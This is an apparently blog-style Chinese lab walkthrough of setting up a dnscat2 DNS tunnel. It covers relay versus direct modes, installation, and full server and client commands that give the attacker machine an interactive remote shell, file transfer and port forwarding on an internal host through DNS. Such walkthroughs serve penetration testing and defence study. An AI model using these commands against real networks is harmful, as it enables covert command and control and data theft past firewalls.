Dnscat2隧道

0x01 前言

  DNS是用来做域名解析的，是连接互联网的关键，故即使是企业内网，在防火墙高度关闭下，也有着很好的连通性，但是黑客却可以通过将其他协议的内容封装再DNS协议中，然后通过DNS请求和响应来传输数据和完成控制。

0x02 DNS隧道的方式

目前DNS隧道目前按照连接方式来分：直连隧道和中继隧道。

  直连隧道：用户直接和控制服务器通过DNS连接，由于直连不经过其他DNS服务器，所以速度快，但是很多用户是对DNS服务器是有配置要求的，只能配置特定的服务器，配置其他的DNS服务器不准许；另外这种方式由于直接连接的，很容易暴漏攻击服务器。

  中继隧道：利用DNS迭代查询方式，中间通过多个DNS服务器的跳转，跳转到最终的控制机，整个解析过程更长，所以性能没有直连好，还要防止DNS缓存。



  在两种DNS 隧道中，用的最多的是中继方式，能让DNS服务器做递归查询，则需要每次查询均采用不同域名的，一句话是每次采用新域名的方式来保证走DNS查询，有较高的隐蔽性。

  同时在大多数渗透场景中服务器端是无法连接到内网客户端的，因为防火墙或NAT内网原因，所以多是通过客户端定时连接服务器端来保持状态。

  本次实验中，我们的关注点在Dnscat2所搭建的DNS隧道，故不作方式上的研究。

0x03 整体环境

  本次我们采用攻击机-Windows DNS服务器-内网机，由于是DNS隧道，故防火墙全开并不受影响。

攻击机Kali
    IP：10.10.10.10
    DNS：10.10.10.100
Windows Service DNS服务器：
    域名：www.qianxin.com IN NS ns.baidu.com    ns.baidu.com IN A 10.10.10.20
内网机Kali：已开启防火墙
    IP：10.10.10.20
    DNS：10.10.10.100

0x04 安装部署

服务端配置

  安装ruby，下载dnscat2，配置服务端依赖环境，通过ruby ./dnscat2.rb测试是否安装成功。

#linux下服务器端安装
#安装ruby
yum install ruby            #服务器端为ruby开发，所以需要先安装ruby才可以运行
git clone https://github.com/iagox86/dnscat2.git /opt/DNSCAT2/   #下载  
cd dnscat2/server/    #进入服务端目录
gem install bundler  #安装bindle捆绑程序
sudo bundle install   #bundle运行限制在非root用户下，不过可以sudo进行root下安装
ruby ./dnscat2.rb

  如果不以root用户身份运行它，则可能无法侦听UDP / 53（可以使用--dnsport进行更改）。如果是这样，您会看到一条错误消息。

客户端配置

  编译客户端应该非常简单-只需编译make / gcc（对于Linux）或Cygwin或Microsoft Visual Studio（对于Windows）即可。这是Linux上的命令：

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make    #编译
./dnscat   测试

  到这里的话，服务端和客户端基本上都配置好了，不过部分环境可能会出现依赖缺少的情况，通过以下命令可以补全

#缺了不少库采用以下方式安装
gem install ecdsa
gem install sha3
gem install salsa20
gem install trollop
gem install trollop

0x05 操作使用

  首先，先启动服务端，服务端会进行监听端口

ruby ./dnscat2.rb ns.baidu.com --secret=hopeamor --no-cache
语言      程序         委派域名        密码          

  再启动客户端，此处先启动同样可行，不过需要注意的是–dns server=www.baidu.com不可以填写成ns.baidu.com，这里的参数是解析dns权威服务器，而不是上级委派服务器。

./dnscat --dns server=www.baidu.com --secret=hopeamor
程序

  接下来，我们在服务端输入如下命令即可

#进入交互状态
session -i 1
#输入shell进入交互
command (localhost.localdomain) 1> shell
Sent request to execute a shell
command (localhost.localdomain) 1> New window created: 2
Shell session created!
#看下shell信息
dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains =  [*]
  1 :: command (localhost.localdomain) [encrypted and verified]
  2 :: sh (localhost.localdomain) [encrypted and verified] [*]
#切换到shell
dnscat2> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
#输入命令：
sh (localhost.localdomain) 2> pwd
sh (localhost.localdomain) 2> /home/test/dns2cat/dnscat2/client

  这时已经完成了连接，跳转至客户端可以看到已经成功连接上了。



  我们在服务端输入ifconfig进行测试，可以看到客户端信息，当然，可以做很多事情。



  连接之后有诸多命令，以下记录了各个命令的使用，在command中使用？调出帮助。

quit（退出控制台）
kill <id>（中断通道）
set（设置，比如设置security=open）
windows（列举出所有的通道）
window -i <id>（连接某个通道）或者使用session -i <id>
clear（清屏）
delay（修改远程会话超时时间）
exec（执行远程机上的程序）
shell（得到一个反弹shell，此处必须在1::command(kali)中使用）
download/upload（两端之间上传下载文件）
supend（返回到上一层，快捷键ctrl+z即可）
listen <本地端口> <控制端IP/127.0.0.1>:<端口>（端口转发，此处）（此处必须在1::command(kali)中使用）

加注：

  本人在使用时，配置好的NS域名却在数据中发现走的是直连模式，也就是攻击机到受害机的DNS协议，结果发现是客户端命令用的直连模式，此处使用中继命令即可，不同的是直连命令下，只能只有ip或a解析，但中继模式下却能进行ns解析的二级域名，并且直连和中继是互通的。

服务端命令：
#启动
sudo ruby./dnscat2.rb ns.abc.com --secret=123456   #方式1【常用】中继模式
sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=533,type=TXT --secret=123456   #方式2直连模式
sudo ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache   #方式3中继
客户端命令：
dnscat --secret=123456 abc.com    #对应 方式1中继模式
dnscat --dns server=<your dnscat2 server ip>,port=553,type=TXT   #对应 方式2，注意使用--dns选项时，port不可省，否则可能连不上，直连模式

–secret 定义了通讯密码。
        两端使用时，均需跟上该密码，可防止中间人攻击。如果不加，dnscat2会生成一个随机字符串，记得拷贝下来在启动客户端时使用。
        同时服务端在运行时，也可通过set secret=<new value>来动态改变
–security 规定了安全级别
        默认情况下，客户端和服务器都支持并会尝试加密。Open表示服务端允许客户端不加密，这样，客户端就可以通过传递–no-encryption参数来禁用加密。当然也可以在编译时，就禁用客户端加密：make nocrypto。
        同时服务端在运行时，也可通过set security=open来动态改变。
–no-cache 禁止缓存
        使用powershell-dnscat2客户端时，务必在运行服务器时添加无缓存选项，因为与dnscat2服务器的caching模式不兼容。